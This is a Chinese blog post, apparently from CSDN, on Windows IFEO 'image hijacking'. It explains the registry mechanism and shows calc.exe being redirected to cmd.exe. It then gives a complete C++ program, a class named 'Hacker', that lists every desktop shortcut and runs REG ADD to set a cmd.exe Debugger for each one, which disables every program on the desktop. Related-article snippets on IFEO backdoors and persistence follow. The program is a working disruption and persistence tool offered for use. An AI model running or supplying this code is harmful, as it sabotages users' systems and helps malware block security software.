关于映像劫持

最新推荐文章于 2023-08-17 12:45:25 发布
最新推荐文章于 2023-08-17 12:45:25 发布
阅读量6.5k 收藏 24
点赞数 6
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46661122/article/details/110383543
版权

什么是映像劫持?
“映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。

映像劫持的原理
映像劫持是利用Windows的IFEO(Image File Execution Options)功能来实现的。IFEO实际上是Windows的一项正常功能,主要用于调试程序,其初衷是在程序启动的时候开启调试器来调试程序,这样一来可以在调试器中观察程序在难以重现的环境中的行为。例如,某个程序在随用户登录自动启动时会出错,但在登录后手动启动时却一切正常,这就可以通过IFEO设置一个调试器,无论程序何时启动,都会开启这个调试器对其进行调试,以便找出问题。很多病毒木马都会使用这种手段阻止安全软件的运行

win+R输入regedit以管理员身份运行打开注册表编辑器,并找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options就是保存IFEO设置的地方


假设我们要对calc.exe进行映像劫持,我们右击新建项,添加项calc.exe,并添加一个字符串值:“Debugger”,修改其值为我们想要打开的文件,在这里我们修改成cmd.exe.(由于cmd.exe存在于操作系统的环境变量中,所以可以不填写绝对路径,如果不存在于操作系统环境变量中,就需要填写文件的绝对路径)
当你运行calc.exe的时候,系统首先会在注册表的Image File Execution Options中寻找名为“calc.exe”的项,如果存在该项,则继续寻找名为“Debugger”的字符串值,如果找到,则转而启动Debugger值中指定的程序,即cmd.exe


这个时候我们保存注册表编辑器。(不在虚拟机实验先导出注册表,做一个备份,避免影响操作系统正常运行)然后我们运行calc.exe(计算器),就会惊讶的发现,我们计算器已经被cmd.exe劫持,计算器已经无法打开。

C/C++遍历当前桌面下所有文件实现映像劫持


#include "shlobj.h" 
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
class Hacker {
public:
	Hacker()
	{
		Path = this->getDesktopPath();
		GetAllgpxFilepathFromfolder(Path);
	}
private:
	string Path;
public:
	list<string> FileName;
private:
	string  getDesktopPath()		//获取桌面路径
	{
		LPITEMIDLIST pidl;
		LPMALLOC pShellMalloc;
		char szDir[200];
		if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
		{
			if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
				// 如果成功返回true  
				SHGetPathFromIDListA(pidl, szDir);
				pShellMalloc->Free(pidl);
			}
			pShellMalloc->Release();
		}

		return string(szDir);
	}

private:
	int  GetAllgpxFilepathFromfolder(string Path)
	{
		char szFind[MAX_PATH];
		WIN32_FIND_DATA FindFileData;
		strcpy(szFind, Path.c_str());
		strcat(szFind, "\\*.*");
		HANDLE hFind = FindFirstFile(szFind, &FindFileData);
		if (INVALID_HANDLE_VALUE == hFind)	return -1;
		do
		{
			if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
			{
				if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
				{
					//发现子目录,递归之
					char szFile[MAX_PATH] = { 0 };
					strcpy(szFile, Path.c_str());
					strcat(szFile, "\\");
					strcat(szFile, FindFileData.cFileName);
					GetAllgpxFilepathFromfolder(szFile);
				}
			}else{
				FileName.push_back(FindFileData.cFileName);
			}
		} while (FindNextFile(hFind, &FindFileData));
		FindClose(hFind);
		return 0;
	}
};

void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
	std::size_t found = S.find(A);
	while (std::string::npos != found) {
		S.replace(found, A.length(), B);
		found = S.find(A, found + 1);
	}
}
int main()
{
	Hacker* one = new Hacker();
	string arr;
	for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
	{
		replaceA_to_B(*itor, ".lnk", ".exe");
		int pos = 0;
		pos =(*itor).find(".exe");
		if (-1 != pos)
		{
			*itor = (*itor).substr(0, pos+4);
		}
	}
	for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
	{
		arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + "  /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
		system(arr.c_str());
	}
	system("pause");
	return 0;
}
白海客
关注
  • 6
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows劫持工具
02-11
使用此工具可以对某个程序进行劫持劫持后被劫持程序本身不会发生变化,但打开后会变为劫持到的程序。 例如:对WeChat.exe(只是举个例子)使用劫持劫持到cmd.exe(命令提示符) 成功后如果打开微信...
C#实现劫持
diaohuofu0847的博客
12-25 368
劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入...
劫持技术(1):简单介绍
weixin_30449453的博客
01-01 209
劫持,即Image File Execution Option.在深入了解这个概念之前,可以简单地认为,它可以令应用程度重定向。这是注册表里的一个功能,可以做这样的尝试: 打开注册表——定位到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options...
劫持技术
whl0071的专栏
04-28 682
劫持技术
Windows权限维持—自启动&劫持&粘滞键&辅助屏保后门&WinLogon
最新发布
剁椒鱼头没剁椒的博客
08-17 1542
在Windows系统中,很多后门利用的方式不是太会区别在域中还是单机上,只是需要考虑在没有网络情况下,如何将shell反弹回来,就比如,在域中一个无网络的主机和一台有网络的主机,前期通过有网络的主机转发上线到无网络主机上,那么我们木马是不是也可以这样设置,在无网络中设置一个正向木马,让其在运行,在有网络中设置一个反向的木马,让其运行,那么我们去连接的时候只要去连接反向木马就可以了,然后在通过这个反向木马去连接正向木马,不就可以了。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。
劫持 Image Hijack
KAKA的博客
07-06 1121
劫持” —— IFEO(Image File Execution Options:像文件执行参数),其实应该被称为 “Image Hijack” 原理 原理请看 tombkeeper 的所表: Windows NT系统在执行一个从命令行调用的可执行文件运行请求时,首先会检查这是否是一个可执行文件,如果是,又是什么格式的,然后就会检查是否存在: [HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Option
安全技巧:劫持与反劫持技术
zhangmiaoping23的专栏
01-14 1537
<br />IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定,系统厂商之所以会这么做,是有一定历史原因的,在Windows NT时代,系统使用一种早期的堆栈Heap,由应用程序管理的内存区域)管理机制,使得一些程序的运行机制与现在的不同,而后随着系统更新换代,厂商修改了系统的堆栈管理机制,通过引入动态内存分配方案,让程序对内存的占用更为减少,在安全上也保护程序不容易被溢出,但是这些改动却导致了一些程序从此再也无法运作,为了兼顾这些出问题的程序,微软以“从长计议”的态度专
C++实现劫持
09-08
基于C++实现的劫持。 通过更改注册表实现对文件的打开方式的锁定更改。
C++劫持后门实例分析
09-03
主要介绍了C++劫持后门,实例分析了C++劫持后门的原理与相关实现技巧,有助于进一步了解后门的原理,需要的朋友可以参考下
解除劫持工具.exe
02-21
解除劫持工具可解决因劫持导致的程序不能运行问题 显示在红色列表框中为被劫持导致无法运行的程序名(同名程序不能在本机器上正常运行,可通过加号增加对其它程序文件的屏蔽) 显示在绿色列表框中为本...
用来劫持的软件(凑字数)
02-18
可以通过改注册表来劫持
注册表 Image File Execution Options 项的作用及使用办法
fogeater的专栏
05-09 7628
<br />  Image File Execution Options<br />   跳转到键值<br />   HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options<br />   在里面添加一个新键值,使用一个你想欺骗的执行文件的名字,好比notepad.exe <br /><br />   注意到在‘Image File Execution Optio
劫持,windows服务启动的两种形式
onlyfunboy的专栏
06-17 1726
1 服务控制管理器(services.exe) 1.1 dll类型的服务 该类型的服务,可以通过svchost.exe通过命令行的方式启动。ZwCreateThreadEx函数是比CreateRemoteThread更底层的函数,可以注入dll到服务程序中。ZwCreateThreadEx函数没有在ntdll.dll中声明,所以需要使用GetProcAddress从ntdll.dll中获取该函数的导出地址。 以上几个服务启动的命令行如下: C:\Windows\System32\svchost.
使用Windows劫持技术实现自动登录
qq_26270085的博客
09-21 513
单位要求办公电脑必须设置登录密码,要求密码长度不小于10,要求字母和数字混合,要求有大小写,还要求有特殊字符,最变态的是要求屏幕保护时间为1分钟,在恢复屏幕时显示登录界面 是可忍孰不可忍,叔可忍,婶也不忍,真是太变态了 于是想着自己做一个自动登录的插件。 1.登录界面如何运行指定程序 首先要解决怎么样在登录界面运行你的程序的问题 Windows登录界面好像可以增加按钮什么的,比如瑞星杀毒软件就把自己的图标放到登录界面,查了半天资料,好像要将动态库注入winlogon线程,有点太复杂了.
简单移除镜像劫持
cackeme的专栏
08-06 2024
所谓镜像劫持,简单地说是程序执行重定向的过程。 假设你机子上有两个可执行文件a.exe和b.exe,如果你双击a.exe却执行了b.exe,那么a.exe就很可能被镜像劫持了。其实镜像劫持没什么技术含量,就是操作注册表"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Opti
木马启动之劫持
COSMOSJie的博客
05-08 379
木马运行的原理其实很简单
权限维持之打造不一样的劫持后门
Ms08067安全实验室
08-03 409
0x01 前言“劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行...
劫持(Image File Execution Options)的解决方案
weixin_34318326的博客
12-09 1979
这几天一直想要把这个经验写一下,总没抽出时间,晚上加加班。样本已经被杀毒U盘的监控干掉,本文回忆下修复过程。 现象: 一媒体朋友的笔记本染毒,杀毒软件起不来。开机就弹出若干个窗口,总也关不掉,直到系统内存耗尽死机,安全模式也是同样的现象。无奈之下,尝试重装系统,不过,因为不少人都知道的原因 ,她只是格式化了C分区,系统重装后,访问其它分区后,再次出现重装前的中毒症状。...
遭遇修改系统时间、使用劫持的xibgptd.exe,netdde32.exe等1
Purpleendurer@CSDN
08-10 2337
遭遇修改系统时间、使用劫持的xibgptd.exe,netdde32.exeendurer 原创2007-08-10 第1版今天中午,一位网友说他的电脑中的杀毒软件无法启动,打开包含杀毒等字样的网页会自动关闭,不停地提示web.exe程序出错,不定期弹出广告窗口。让偶通过QQ远程协助。先到 http://endurer.ys168.com 下载 HijackThis,ProcV
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值